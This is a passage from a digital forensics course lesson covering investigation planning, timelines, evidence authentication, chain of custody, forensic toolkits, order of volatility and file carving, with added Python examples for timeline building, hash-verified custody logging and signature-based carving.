Model: Proposed Model for Digital Forensic Investigation (Mir, et al., 2016)
Phases:
1. Planning
2. Identification
3. Collection
4. Reconnaissance
5. Transport and storage
6. Examination
7. Analysis
8. Proof and defense
9. Archive storage
10. Presentation and results

Instructor note: If you'd like to provide your students with a more in-depth look at each phase of these models, consider searching online for the published papers.

Figure 11-1: The Generic Computer Forensic Investigation Model (GCFIM) consolidates many of
the phases that are interchangeable between forensic models. Note the ability to return to a
previous phase.

OLE Computer Forensics Standard
Although not technically a model, the document "Searching and Seizing Computers and Obtaining Electronic Evidence in Criminal Investigations" is a de facto standard for computer forensics. It is published by the U.S. Department of Justice's Office of Legal Education (OLE) and is available at: https://www.justice.gov/sites/default/files/criminal-ccips/legacy/2015/01/14/ssmanual2009.pdf.

Forensic Investigation Preparation
The following is a list of actions you can take to prepare for a forensic investigation:
• Know the hardware used in your organization.
This can be everything from workstations, network devices, mobile devices, removable media, and more. All these are potential sources of evidence, and they all have unique characteristics. Be aware of how each type of hardware can assist an investigation.
• Know the operating systems used in your organization.
Different operating systems fulfill different purposes, and likewise, each may require a different approach to evidence collection and analysis. Of particular concern is the difference in file system types between Windows®, macOS®, and Linux® environments.
• Know the software used in your organization.
The more familiar you are with the programs personnel and devices use on a day-to-day basis, the easier it will be to extract relevant information from these programs.
• Know the tools of the trade.
You shouldn't select forensic utilities after an incident occurs, but rather beforehand. This way, you won't be scrambling to learn a new tool in the middle of your investigation.
• Know the virtualized environments in your organization.
Performing forensic investigations on virtual machines (VMs) is more of a challenge than investigating a local machine because of the distributed nature of virtual environments. There may be only small traces of evidence left on multiple hosts in a storage cluster, rather than a single storage drive you can easily create an image from.
• Know the systems that must stay active during an investigation.
There are times when you won't necessarily have the opportunity to isolate a system when you've marked it as evidence. Some systems must stay active for business reasons, and for technical reasons you may not be able to replicate their contents to an isolated environment. Consider how an active system might affect the integrity of the evidence that resides on it.
• Know the applicable laws and regulations.
Failing to understand cyber laws may render your investigation pointless. You should stay current on all applicable computer-related laws and regulations so you can quickly identify when an investigation is and is not legally viable.
• Ensure that there is a policy in place and that you are following it.
Policy in the organization, and whether or not it has been followed consistently, can make a significant difference in terms of whether action (legal, administrative, or otherwise) can be taken against an entity once forensic data has been collected. There are many real-life cases where, after data was collected, the perpetrator was not prosecuted/penalized because either no policy specifically addressing acceptable use was in place or because the investigator(s) overstepped their legal bounds.

Instructor note: This might be a good place to remind students about the usefulness of site books in recording asset and configuration information.

Investigation Scope
There are times in an investigation when you come across activity beyond what you had originally set out to investigate. For example, your organization has been the victim of a denial of service (DoS) attack. You think you've narrowed down possible culprits to internal employees, and you move to confiscate specific workstations that you suspect carried out the attack. In the process of investigating these workstations, you come across activity forbidden by company policy, as you find evidence of a workstation's user posting company credentials on a public web forum. This suggests another incident has taken place, possibly separate from the one you're investigating.
How should you plan to address something like this? This often comes down to what approach management wants to take. You should ask your supervisor if you should continue focusing on the main investigation, if you should start a new investigation, or if you should incorporate this new evidence into the existing investigation. You may need to dig deeper and find out if this new evidence is related to the current investigation before your supervisor can make an informed decision. Taking on too large a scope could muddy your investigation, especially if your organization is low on qualified forensic personnel and you don't receive much help. If you don't consult with your supervisor, you could place yourself, the investigation, and the evidence in jeopardy.

Timeline Generation and Analysis

A significant part of your forensic investigation will involve tying events to specific times so you
may establish a consistent and verifiable narrative. The visual representation of events happening in
chronological order is called a timeline, and it can be a powerful tool in your forensic toolkit. Being
able to analyze a timeline will give you a holistic perspective of the incident that wouldn't otherwise
be possible.

Consider mentioning to students that modified, accessed, and created (MAC) times are updated
differently based on the file system used.

Timelines can be represented in a number of different ways, and a simple but effective way is by
using spreadsheets. With a spreadsheet, you can sort and manage large amounts of data while
preserving the relevance of the time of an event or evidence. Typically, you'd tag each event or piece
of evidence by several important identifiers. For example, you can list files you find in a computer's
web browser cache by their file name, date/time created, date/time last accessed, and date/time last
modified.

Figure 11-2: A spreadsheet of a computer's web browser cache with relevant timeline
information.

However, large stores of evidence can prove unwieldy in a simple spreadsheet. Many forensic tools
have their own timeline generation features that can assist you in collecting file metadata and event
information automatically. Software like log2timeline can parse millions of artifacts on a drive and
essentially generate a timeline of every recorded event on a particular system. This is called a super
timeline, and without the assistance of a tool, it can be infeasible to generate manually.
No matter what tools you use, you need to ensure the clocks from all relevant sources are
synchronized; if they can't be synchronized, then you must note any time offsets so that events are
placed in the proper context.

Note: In addition to using tools to list specific items in the context of time, you can also
perform a more qualitative analysis of the timeline of an event. For example, your report could
be in a narrative form, in which you essentially tell a story about what you believe happened and
when.
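The following added example (not part of the course materials) builds the kind of timeline described above from three constructed sources whose clocks disagree: each source's measured clock offset is removed before the events are merged and sorted, and the result is written as the CSV rows a spreadsheet timeline would hold. The sources, timestamps, offsets, account name, and addresses are all constructed sample data.

```python
"""Build one sorted timeline from evidence sources whose clocks disagree.

Added example (not from the CFR-410 course): a browser-cache listing, a
firewall log and a Windows event log are normalised to UTC, each source's
known clock offset is removed, and the merged events are emitted as CSV.
Every input below is constructed sample data.
"""
import csv
import io
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass
class Event:
    ts: datetime      # normalised to UTC, offset removed
    source: str
    artifact: str
    action: str
    raw_ts: str       # the timestamp exactly as the source recorded it


# Constructed sources. Each records time in its own format and zone.
BROWSER_CACHE = [  # (file, created, accessed, modified) in workstation local time
    ("index.html", "2023-04-02 09:14:03", "2023-04-02 09:14:03", "2023-04-02 09:14:03"),
    ("payload.js", "2023-04-02 09:14:05", "2023-04-02 09:14:07", "2023-04-02 09:14:05"),
]
FIREWALL_LOG = [  # UTC syslog lines; the firewall clock was measured 90 s fast
    "2023-04-02T13:15:35Z ALLOW 10.0.0.23:51544 -> 203.0.113.9:443",
    "2023-04-02T13:15:36Z ALLOW 10.0.0.23:51545 -> 203.0.113.9:443",
]
EVENT_LOG = [  # (epoch seconds, event id, message); the host clock was 5 min slow
    (1680440938, 4624, "An account was successfully logged on: ajones"),
    (1680440949, 4688, "A new process has been created: powershell.exe"),
]

# Offsets measured at acquisition: how far each clock was AHEAD of the
# reference clock (the NTP-synchronised forensic workstation). A fast clock
# has a positive offset and its events are shifted back; a slow clock, forward.
CLOCK_OFFSETS = {
    "browser_cache": timedelta(0),           # the workstation is the reference
    "firewall": timedelta(seconds=90),
    "eventlog": timedelta(minutes=-5),
}
LOCAL_TZ = timezone(timedelta(hours=-4))     # constructed workstation time zone


def normalise(ts: datetime, source: str) -> datetime:
    """Convert a source timestamp to UTC and remove that source's clock offset."""
    if ts.tzinfo is None:
        ts = ts.replace(tzinfo=LOCAL_TZ)
    return ts.astimezone(timezone.utc) - CLOCK_OFFSETS[source]


def parse_all() -> list[Event]:
    events: list[Event] = []
    for name, created, accessed, modified in BROWSER_CACHE:
        # Each MAC time becomes its own row so the order of operations on a
        # single file is visible in the merged timeline.
        for action, raw in (("created", created), ("accessed", accessed), ("modified", modified)):
            ts = datetime.strptime(raw, "%Y-%m-%d %H:%M:%S")
            events.append(Event(normalise(ts, "browser_cache"), "browser_cache", name, action, raw))
    for line in FIREWALL_LOG:
        raw, _, rest = line.partition(" ")
        action, artifact = rest.split(" ", 1)
        ts = datetime.strptime(raw, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(Event(normalise(ts, "firewall"), "firewall", artifact, action, raw))
    for epoch, event_id, msg in EVENT_LOG:
        ts = datetime.fromtimestamp(epoch, tz=timezone.utc)
        events.append(Event(normalise(ts, "eventlog"), "eventlog", msg, f"EventID {event_id}", str(epoch)))
    return events


def build_timeline() -> list[Event]:
    """Merged timeline, oldest first; ties are broken by source name for a stable order."""
    return sorted(parse_all(), key=lambda e: (e.ts, e.source))


def to_csv(events: list[Event]) -> str:
    """Spreadsheet-ready rows: corrected UTC time plus the raw timestamp for audit."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["utc_time", "source", "action", "artifact", "raw_timestamp"])
    for e in events:
        writer.writerow([e.ts.isoformat(), e.source, e.action, e.artifact, e.raw_ts])
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(build_timeline()))
```

Keeping the raw timestamp beside the corrected one lets a reviewer check every offset correction against the original source record.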


Authentication of Evidence
Gathering evidence does not automatically mean the evidence is admissible in a court or that it is
completely validated in an investigation. The evidence must be authenticated or confirmed to be
exactly what a proponent of that evidence claims it is. For example, you may present a drive image
as evidence of an intrusion to a court, but until a technical expert in the employ of the court can
verify the hash of that image, it is not authenticated.
As you create a forensic investigation plan, you should consider how the various types of evidence
you can collect may be authenticated. This will help shape your investigation by underscoring its
crucial findings while trimming the weaker or inconclusive aspects. Take the example of an
operating system log recording that a user account, A. Jones, was signed in as an attack was
launched from that host. If the access control mechanisms in place are weak or non-existent, then
the court will be much less inclined to authenticate this as evidence that employee Aaron Jones
signed in, and not someone impersonating him.
You may also need to concede that some evidence simply cannot be authenticated, and therefore
will not be admissible. Different jurisdictions have different standards for authentication, and these
standards may be too strict for you to meet with specific types of evidence. Sensitive network
transmissions, like financial transactions, are particularly hard to authenticate because of their
confidential and ephemeral nature. Also recognize that some evidence—hearsay, especially—will
not necessarily be admissible even if it is authenticated.

Chain of Custody

The chain of custody is the record of evidence handling from collection, to presentation in court,
to disposal. The evidence can be hardware components, electronic data, telephone systems, and
more. The chain of evidence reinforces the integrity and proper custody of evidence throughout the
entire investigative process. Every person in the chain who handles evidence must log the methods
and tools they used. This can be done manually, like forensic personnel filling out a form, or it can
be done by an automated process that generates and maintains audit trails of actions taken. Both
approaches may be used at different points in the investigation.

Consider showing students a chain of custody form. For example, you can search for DA Form
4137, which is provided by the U.S. Department of the Army.

When security breaches go to trial, the chain of custody protects an organization against accusations
that evidence has either been tampered with or is wholly different than it was when collected.

Note: The chain of custody is a legal term that predates digital forensics, but the same basic
principles apply.

Figure 11-3: The chain of custody from evidence collection through disposal.
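As an added example (not from the course), the following script ties the Authentication of Evidence and Chain of Custody discussions together: a drive image is hashed at acquisition, each hand-off is logged with the person, method, and tool, and every recipient re-hashes the image so that a single flipped bit is caught and recorded. The image bytes and case number are constructed; the handler names reuse those of the scenario in this topic.

```python
"""Authenticate an evidence image by hash and keep a chain-of-custody log.

Added example (not from the CFR-410 course): the image is hashed when it is
acquired, every hand-off appends an entry to an append-only log, and each
custodian re-hashes the image so tampering is detected at the point of
transfer. Image bytes, names and case number are constructed sample data.
"""
import hashlib
import json
from datetime import datetime, timezone

CASE_ID = "CASE-0000-EXAMPLE"  # placeholder case number, not a real one


def hash_image(data: bytes, algorithm: str = "sha256") -> str:
    """Hash an image in 1 MiB chunks so real multi-gigabyte images fit in memory."""
    h = hashlib.new(algorithm)
    view = memoryview(data)
    chunk = 1 << 20
    for i in range(0, len(view), chunk):
        h.update(view[i:i + chunk])
    return h.hexdigest()


class CustodyLog:
    """Append-only record of who handled an evidence item, when, how, and with what tool."""

    def __init__(self, item_id: str, acquired_by: str, method: str, tool: str, data: bytes):
        self.item_id = item_id
        # The acquisition hash is the reference every later hash is compared with.
        self.reference_hash = hash_image(data)
        self.entries: list[dict] = []
        self._append(acquired_by, "acquired", method, tool, self.reference_hash)

    def _append(self, person: str, action: str, method: str, tool: str, observed_hash: str) -> None:
        self.entries.append({
            "case": CASE_ID,
            "item": self.item_id,
            "time_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
            "person": person,
            "action": action,
            "method": method,
            "tool": tool,
            "sha256": observed_hash,
            "matches_reference": observed_hash == self.reference_hash,
        })

    def transfer(self, to_person: str, method: str, tool: str, data: bytes) -> bool:
        """Record a hand-off. The receiver re-hashes the image; a mismatch is
        logged rather than silently dropped, and reported to the caller."""
        observed = hash_image(data)
        self._append(to_person, "received", method, tool, observed)
        return observed == self.reference_hash

    def verify(self, data: bytes) -> bool:
        """Does this copy still match the acquisition hash?"""
        return hash_image(data) == self.reference_hash

    def to_json(self) -> str:
        return json.dumps(self.entries, indent=2)


def demo() -> tuple[bool, bool]:
    """Two hand-offs: an intact copy, then a copy with one bit flipped."""
    image = bytes(range(256)) * 4096          # constructed stand-in for a raw image
    log = CustodyLog("HDD-01", "Emily", "dd via write blocker", "dd", image)
    ok_first = log.transfer("Barry", "sealed bag, locked closet", "sha256sum", image)
    tampered = bytearray(image)
    tampered[100000] ^= 0x01                  # a single changed bit anywhere in the image
    ok_second = log.transfer("Outside expert", "courier", "sha256sum", bytes(tampered))
    return ok_first, ok_second


if __name__ == "__main__":
    first, second = demo()
    print(f"hand-off 1 authenticated: {first}; hand-off 2 authenticated: {second}")
```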
Example

Consider the following scenario:
1. Adam, the security administrator, detects an abnormal amount of outgoing traffic from a
database that stores password hashes. No one besides the security team is authorized to access
this database. The destination IP of the outgoing traffic is attached to the workstation of an IT
employee who is currently on vacation.
2. Adam notifies his boss, Barry, of the abnormal traffic. Barry asks security engineer Emily to take
snapshots of the database in its current state, and cautions her to make sure backups from at
least a week prior are retained.
3. Emily uses her workstation to remotely log in to the server with the affected database and takes a
snapshot. She then extends the retention period of all backups saved in the past week.
4. Meanwhile, Barry commandeers the IT workstation and locks it in a security closet to which only
he, the building manager, and the CEO have keys.
5. After Emily is finished, Barry takes her workstation and the server with the affected database and
locks them in the same closet.
6. Barry asks the building manager for the security camera footage of the past 24 hours, and places
a copy of this footage in the closet.
7. Barry writes up an incident report and details every step of the process, mentioning every
individual involved in the evidence collection.

Analysis
Assuming the camera footage shows someone accessing the absent employee's workstation, this
incident may go to trial and charges may be levied against the person identified on camera.
However, if Barry had never documented the chain of custody of each piece of evidence as it passed
from his coworkers' hands to his own, the suspect could bring reasonable doubt to the legitimacy of
this evidence. What if the database logs that record the outgoing traffic were tampered with to point
to an erroneous IP address? What if the camera footage was not from that day, but previous footage
of the suspect using the employee workstation with permission? These are questions a defense team
will raise to cast doubt on the investigation. Since Barry wisely kept the chain of custody on record,
it will be much more difficult for the defense to convince the judge the evidence should be
inadmissible in court.

Communication and Interaction with Third Parties

Depending on your organization's available resources and the extent of an incident, you may need to
contract with third-party forensic investigators and analysts. Some organizations are in the business
of forensics, and may provide you and your team invaluable insight into the processes and
procedures of incident investigation. If this is the case, you will likely need to work with these
third-party forensic experts as a team.
Effective collaboration with a third party means sharing information that the third party needs to
successfully complete their assigned duties. You should also be in constant contact with the third
party to not only check on their progress, but also to add their findings to the overall narrative of
the investigation. If one or all parties stay isolated and fail to share their findings in a timely fashion,
the investigation may end up being ineffective and inefficient. You should agree to a plan or
schedule that keeps communication consistent.
Another third party that may assist you in your investigation is law enforcement. Law enforcement
personnel are likely to have more experience with criminal cases, but they may not have the
technical expertise or intra-organization knowledge that you do. When you involve law enforcement,
you also run the risk of them seizing evidence for long periods of time, even after the case is
concluded. You or other members of your organization must determine if this would impact
business operations enough to be too risky.
Forensic Toolkit: Open Source Software

Establishing a toolkit is an important part of preparing for a forensic investigation. You should not
just limit yourself to tools with a narrow scope; your toolkit should be broad enough to cover the
many different dimensions of forensic analysis. One tool will not necessarily cover all of these
dimensions. For example, a drive image is pointless without a tool to hash that image. If your toolkit
isn't comprehensive, you can be caught off guard in the middle of an investigation.

You don't necessarily need to discuss these tools in detail. The intent is to make students aware of
their options.

The following table describes some of the most common open source software tools used to collect
and analyze evidence.

Software Tool | Supported Operating System(s) | Description
The Sleuth Kit (TSK) | Cross-platform | A general-purpose forensic tool. It has a graphical front-end called Autopsy.
CAINE | n/a | A Linux distribution that includes existing forensic software.
SANS Investigative Forensic Toolkit (SIFT) | Ubuntu (Linux) | A suite of tools developed by the SANS Institute that comes with a number of freeware applications used in forensic investigations.
Digital Forensics Framework (DFF) | Cross-platform | A general-purpose forensic tool that can be used by non-experts in addition to professionals.
Volatility | Windows, Linux | A tool used to analyze volatile memory like RAM.
Rekall | Cross-platform | A forensic analysis framework that supports live volatile memory analysis on multiple platforms.
md5sum | Windows, Linux | A tool that calculates the Message Digest 5 (MD5) hashes of a file or group of files.
sha256sum | Windows, Linux | A tool that calculates the Secure Hash Algorithm (SHA-256) hashes of a file or group of files.
md5deep | Cross-platform | Similar to md5sum and sha256sum, but includes additional features, like the ability to traverse directory structures recursively. Supports SHA-1, SHA-256, and other algorithms beyond just MD5.
Foremost | Linux | A data recovery and file carving tool.
TestDisk | Cross-platform | A data recovery tool.
PhotoRec | Cross-platform | A data recovery and file carving tool.
log2timeline | Cross-platform | A timeline generation tool.
Wireshark | Cross-platform | A packet capture and analysis tool that can be useful for network forensics.
Kali Linux Forensic Mode

Kali Linux™ has several live boot options, one of which is Forensic Mode. In Forensic Mode, Kali
Linux never accesses or automatically mounts internal drives, nor does it use swap space on these
drives. Forensic Mode also disables the automatic mounting of removable media like USB thumb
drives. These restrictions ensure that the operating system does not initiate an action that could
compromise the integrity of forensic evidence during analysis.
Forensic Toolkit: Proprietary Software

In addition to open source forensic software, there are some proprietary software solutions as
outlined in the following table.

Software Tool | Supported Operating System(s) | Description
EnCase | Windows | A tool that supports a wide range of forensic methods, including evidence collection, analysis, and reporting.
Helix3 | n/a | A Linux distribution that includes various forensic software tools.
Forensic Toolkit® (FTK®) | Windows | A multi-purpose utility developed by Exterro (previously AccessData) that can scan a storage drive and detect behavior that may be of interest to an investigator, such as deleted communications. It has a program that images a drive and automatically creates a hash of that image. It also includes a password cracking utility.
AD eDiscovery | n/a | A platform developed by Exterro that supports the full electronic discovery (e-discovery) process. It also enables an investigator or auditor to search or audit large sets of structured or unstructured data.
Forensic Explorer | Windows | A tool with a wide variety of features, including file carving, hashing, keyword searching, and more.
Binalyze AIR | Windows | A suite of digital forensics tools with automated incident response capabilities. It can integrate with existing SIEM/EDR systems as well as Active Directory environments.
Elcomsoft Forensic Disk Decryptor | Windows | A cryptographic tool that can be used to crack certain encrypted containers by retrieving passwords in memory.
WindowsSCOPE | Windows | A tool used to analyze volatile memory like RAM.
HashMyFiles | Windows | A freeware application that calculates the MD5 and SHA hashes of a file or group of files.
Forensic Toolkit: Physical

In addition to the various software programs available, you also need to consider collecting physical
tools to place in your forensic toolkit.

Physical Tool | Description
Digital forensics workstations | To perform any kind of meaningful collection and analysis of evidence, you'll need one or more computers that act as the hub for your forensic investigation. These workstations need to be access controlled, hardened, and isolated from any production systems that could be part of the incident. They should also be stocked with up-to-date versions of forensic software, like the applications mentioned in the previous table.
Cables and drive adapters | After you collect an internal drive as evidence, you'll want to analyze that drive from your forensics workstation, rather than the computer the drive came from. Instead of installing it directly in your forensics workstation, it'll be a better use of your time to connect it externally through the necessary cables and adapters. For example, there are cables and adapters that can enable you to connect a Serial Advanced Technology Attachment (SATA) drive to both an AC power source and a USB port for data transfer. Rather than connect the drive directly to your forensics workstation, you'll want to connect it to a write blocker so you can create an evidence file of the drive.
Removable media | In some cases, you'll need to quickly offload or transfer data to a removable storage device so that a backup of the evidence can be stored quickly and securely. For example, if you image a drive suspected of compromise, you can store that image on removable media so that it can be easily moved to another workstation or provided to other personnel involved in the investigation. Any removable media you use in this manner should be completely wiped beforehand to prevent any contamination of evidence.
Write blockers | Contamination of evidence is a significant concern among forensic investigators. One of the most crucial tools in preserving the integrity of evidence is a write blocker. A write blocker is a drive controller that accesses a drive in read-only mode and prevents the operating system from writing data to the drive. If even a single bit changes on a drive as a result of the investigation, the authenticity of evidence may be called into question—write blockers prevent this from happening.
Mobile device forensics tools | Forensic analysis of mobile devices is a relatively new field, but the rising popularity of mobile computing means that it is an inevitable aspect of the forensic process. Many of the tools available, like Cellebrite UFED and MOBILedit Forensic, include hardware components that physically connect to smartphones and tablets. They also provide investigators with software-based management interfaces.
Cameras | High-quality digital cameras are necessary to uphold the integrity of evidence during a forensic investigation. You may be called on to take photographs of affected devices, or, if there was a physical intrusion, photographs of a crime scene. Poor-quality cameras can obscure the relevant detail in a picture, making it more difficult for you to prove some aspect of an incident.
Crime tape and tamper-proof seals | In a physical incident, crime tape can help you cordon off specific areas of a building or another environment while the investigation is underway. This will deter employees and customers from wandering into the area and contaminating evidence. Tamper-proof seals will help you clearly identify if an evidence bag or other forensic container has been accessed by unauthorized personnel, which can likewise deter people from compromising the integrity of evidence.


Guidelines for Applying a Forensic Investigation Plan

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
CHOICE Course screen.

Follow these guidelines when applying a forensic investigation plan.

Apply a Forensic Investigation Plan

To apply a forensic investigation plan:
• Develop a plan for who (such as which internal staff or external parties) will handle each type of
forensic task, based on required skills and abilities, cost, response time, and data sensitivity.
• Create and maintain forensic investigation guidelines and procedures based on the organization's
policies. Documentation should be provided to incident response personnel and any external
teams identified as participants in forensic activities to ensure the organization's policies are
followed.
• To ensure you'll be able to collect as much digital evidence as possible, make sure that systems
are configured when deployed in advance of any incident or investigation to maximize the
amount of collectable data. For example, enable a computer's or device's auditing services.
• The organization should develop its own capability to perform digital forensics. The skills
required for this capability are valuable in a variety of circumstances, not only in incident
response situations. For example, forensic skills may be useful in troubleshooting operational
problems; supporting ongoing maintenance of audit records; recovering data when there are
system problems or user errors; investigating cyber crimes and inappropriate behavior;
reconstructing computer security incidents; and monitoring actions conducted by third parties,
such as police investigators, on the organization's systems.

ACTIVITY 11-1
Applying a Forensic Investigation Plan

Scenario

Under the Chief Information Security Officer's (CISO's) authorization, the cybersecurity incident
response team (CSIRT) has handed off their work to you, a forensic investigator for Develetech.
Your company's forensic model follows this basic pattern:
1. Preparation
2. Acquisition
3. Analysis
4. Presentation and review
Using this model, you'll begin to develop a plan for each phase of the process. This plan will help
you perform your investigative duties to the best of your ability, and hopefully will make it easier for
you to discover the source of this data breach.

If necessary, refresh students' memories of the incident scenario by showing them the activity slides
from the previous lesson.

1. What must you know about Develetech's computing environments to prepare for a forensic
investigation?
A: Answers will vary. You need to know the following about the systems affected by the incident: the
type of hardware in place; the operating systems and other software used on the computers; any
environments that may have been virtualized versus those that are physical; the forensic tools of
the trade that can assist you in your duties; any of Develetech's systems that must stay active
during an investigation to support business needs; and all applicable laws and regulations that
could impact your work.

2. Pat's workstation has a real-time anti-malware scan running when the computer is powered on.
One of your team members had the idea of looking at those logs, even though no malware was
detected in the incident response phase. He reviewed the logs, and the smartwatch_schematic3.png
file was detected as the scanner swept the USB drive that was attached at the time of intrusion.
Because the anti-malware solution keeps logs of some of the files it scans, when it scanned the USB
drive, it captured the names of some other files that were on the USB drive.
How can an analysis of these anti-malware logs help your investigation?
A: Answers may vary, but the team might be able to discover identifying information from the titles of
the other files on the USB drive. This could lead them to the culprit or at least the owner of the
USB drive.

3. None of the file names logged by the anti-malware solution revealed any identifying information.
However, the team searched for each file name in the company's network storage spaces
provisioned to each employee. This search produced one result: the file my_contract_invoice3.docx,
which was enumerated in the anti-malware scan, exists in the network storage space of an employee
named Rupert. Your investigation isn't done, but you think you've gathered enough evidence to
present to your supervisor so that you can take action.
What are some of the important steps involved in upholding the integrity of your investigation?
How can you better convince your audience of your findings?
A: Answers may vary, but observing the chain of custody is a must for any investigation. The
movement of Pat's workstation and the research and development server should be documented
based on who last worked with each computer and what exactly was done. This process should
be ongoing. Furthermore, you need to consider how the evidence you found so far can be
authenticated. You need to demonstrate to your supervisor, and possibly to law enforcement in
the future, that the evidence you gathered has not been tampered with. One example is by
hashing the images of each drive so that an outside party can verify that hash when the evidence
makes its way into their custody.


TOPIC B
Securely Collect and Analyze Electronic Evidence
You have a forensic investigation plan in place. Now, as you collect and analyze evidence, you'll
need to ensure you follow certain protocols to preserve data in a useful and secure format.

Order of Volatility

Data is volatile, and the ability to retrieve or validate data after a security incident depends on where
it is stored, whether in a storage location or in a memory layer of a computer or external device. For
example, data on backup CDs or thumb drives can last for years, while data in random-access
memory (RAM) may last for only nanoseconds.
The order in which you need to recover data after an incident, before the data deteriorates, is erased,
or is overwritten, is known as the order of volatility. From most volatile to least volatile, the general
order of volatility for storage media is:
1. CPU registers, CPU caches, and RAM.
2. Network caches and virtual memory.
3. Hard drives, flash drives, and solid-state drives (SSDs).
4. CD-ROMs, DVD-ROMs, and printouts.

Note: Volatility may also refer to the memory's impermanence when disconnected from a
power source. RAM loses its memory when it loses power, and is therefore volatile. An SSD will
retain its memory even when it loses power, and is therefore non-volatile.

The order of volatility is another factor that will influence your response to incidents. Highly volatile
memory like RAM may not be worth your time to present as evidence, as any trace of an intrusion
might be gone from the cache before you can possibly capture it. Still, some experiments have
shown that cryogenically frozen memory may be able to retain its non-degraded state for several
days. For most organizations, this will not be a feasible option, but it could be a viable means of
forensic preservation in the future.
Instead of relying on an after-the-fact collection of volatile data, there are tools that can automate
volatile memory collection on live systems, even for highly volatile memory. These tools are often
batch scripts that execute various other tools to continuously capture and log network traffic,
operating system registries, RAM snapshots, and more. Committing these types of information to
permanent memory can pose a risk, so you must remember to follow the proper chain of custody
procedures to keep the information from being stolen or tampered with.

File Systems

A computer's file system can reveal a great deal of useful information concerning an incident,
including the following:
• Directory structure.
• File location.
• File size.
• File names.
• Date and time values (last modified, last accessed, etc.).
• Miscellaneous attributes of files and folders.
Analyzing this metadata can help you establish your timeline of events for an incident that has left
traces on a host and its files.

Lesson 11: Investigating Cybersecurity Incidents | Topic B



There are a number of methods you can use to collect this metadata. Capturing a drive image will
keep the file system intact for later analysis. For a more specialized approach, there are various tools
that can help you collect and view file system metadata. For example, TSK is a forensic tool that can
analyze a file system without needing to go through the operating system. This makes the tool ideal
for collecting hidden or deleted files.
Not all file systems handle metadata the same. Factors like the age of the hardware and software, as
well as their manufacturer, may influence which file system type is used on a host. Older computers,
for example, may still use File Allocation Table 32 (FAT32), whereas newer Windows hosts will use
New Technology File System (NTFS) or, less commonly, Resilient File System (ReFS). Apple
macOS computers typically use Apple File System (APFS) or Hierarchical File System Plus (HFS+),
whereas Linux distributions commonly use ext3, ext4, Btrfs, or ZFS. Flash memory devices like
USB thumb drives and SD cards, regardless of what operating system they're used with, often use
Extensible File Allocation Table (exFAT).
Some collection tools like TSK actually support most of the major file system types, but you should
still be aware of the file system you're collecting.

File Carving and Data Extraction

File carving is the process of extracting data from a computer when that data has no associated file
system metadata. The file system metadata describes where a file exists in memory. Because files are
often fragmented into many pieces, there is not one single address that the file resides in. This is
why file system metadata that collates many addresses is so useful. When a user performs a normal
delete operation, like moving a document to the recycle bin, the file system deletes its metadata on
that file, rather than actually deleting where it is in memory. When you engage in file carving, you are
attempting to piece these fragments together to reconstruct the file.
This is essential to evidence collection, as even files a malicious user tries to delete may remain on
the target system. Data recovery software like PhotoRec and Foremost can perform file carving
techniques to extract deleted or corrupted data from a drive partition.
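The following added example (not from the course, and not the code of Foremost or PhotoRec) shows the signature-based carving those tools perform: it scans a raw image for PNG and JPEG header and footer magic numbers and carves out each complete match without any file system metadata. The partition image is constructed in memory, including a truncated PNG header, to show how a header with no matching footer is handled.

```python
"""Signature-based file carving from a raw image with no file-system metadata.

Added example (not from the CFR-410 course): known header/footer byte
signatures for PNG and JPEG are searched in a raw partition image and each
complete match is carved out as a standalone file. The image is constructed
in memory so the script runs offline.
"""
import struct
import zlib

# Header and footer magic numbers (real values, as carving tools use them).
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
}
MAX_CARVE = 10 * 1024 * 1024  # stop looking for a footer 10 MiB past a header


def carve(image: bytes, max_size: int = MAX_CARVE) -> list[tuple[str, int, bytes]]:
    """Return (type, offset, data) for every header whose footer is found.

    The scan works on raw bytes only, so files whose metadata was deleted and
    files sitting in unallocated space are recovered exactly the same way.
    """
    found = []
    for kind, (header, footer) in SIGNATURES.items():
        pos = image.find(header)
        while pos != -1:
            end = image.find(footer, pos + len(header), pos + max_size)
            if end != -1:
                end += len(footer)
                found.append((kind, pos, image[pos:end]))
                pos = image.find(header, end)        # continue after the carved file
            else:
                # Header with no footer in range: false positive or a truncated
                # file. Skip it rather than carve an unbounded blob.
                pos = image.find(header, pos + 1)
    return sorted(found, key=lambda f: f[1])


def tiny_png(width: int, height: int) -> bytes:
    """Build a valid minimal greyscale PNG so the carved output is a real file."""
    def chunk(tag: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(tag + body)                 # PNG CRC covers type + data
        return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)
    # One filter byte (0 = none) followed by `width` grey pixels per row.
    raw = b"".join(b"\x00" + bytes([0x80]) * width for _ in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    return (SIGNATURES["png"][0] + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b""))


def build_sample_image() -> bytes:
    """Constructed 'partition': slack, a PNG, filler, a JPEG stub, slack, a stray header."""
    png = tiny_png(4, 2)
    jpg = b"\xff\xd8\xff\xe0" + b"\x00\x10JFIF\x00" + b"\x00" * 40 + b"\xff\xd9"
    stray = SIGNATURES["png"][0] + b"\x00" * 64   # PNG header with no IEND
    return b"\x00" * 512 + png + b"\xff" * 300 + jpg + b"\x00" * 128 + stray


if __name__ == "__main__":
    for kind, offset, data in carve(build_sample_image()):
        print(f"{kind} at offset {offset}: {len(data)} bytes")
```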
Data Preservation for Forensics

Criminal cases or internal security audits can take months or years to resolve. You must be able to
preserve all the gathered evidence in a proper manner for a lengthy period of time. As you're
probably aware, computer hardware is prone to wear and tear, and important storage media like
hard disks can fail even when used normally, or when not used at all. A failure of this kind may
mean the corruption or loss of your evidence, both of which may have severe repercussions for your
investigation.
Therefore, when possible, you should replicate evidence across multiple storage media for the
purpose of redundancy. You should also be careful when selecting where to physically store this
hardware. Rooms without proper climate controls will increase the risk of hardware failure,
especially if these electronics overheat.
Evidence can also become overwhelming by its sheer size and scope. That's why it's important to
create metadata that accurately defines characteristics about data, like its type, the date it was
collected and hashed, and what purpose it serves.
o

Secure Storage of Physical Evidence


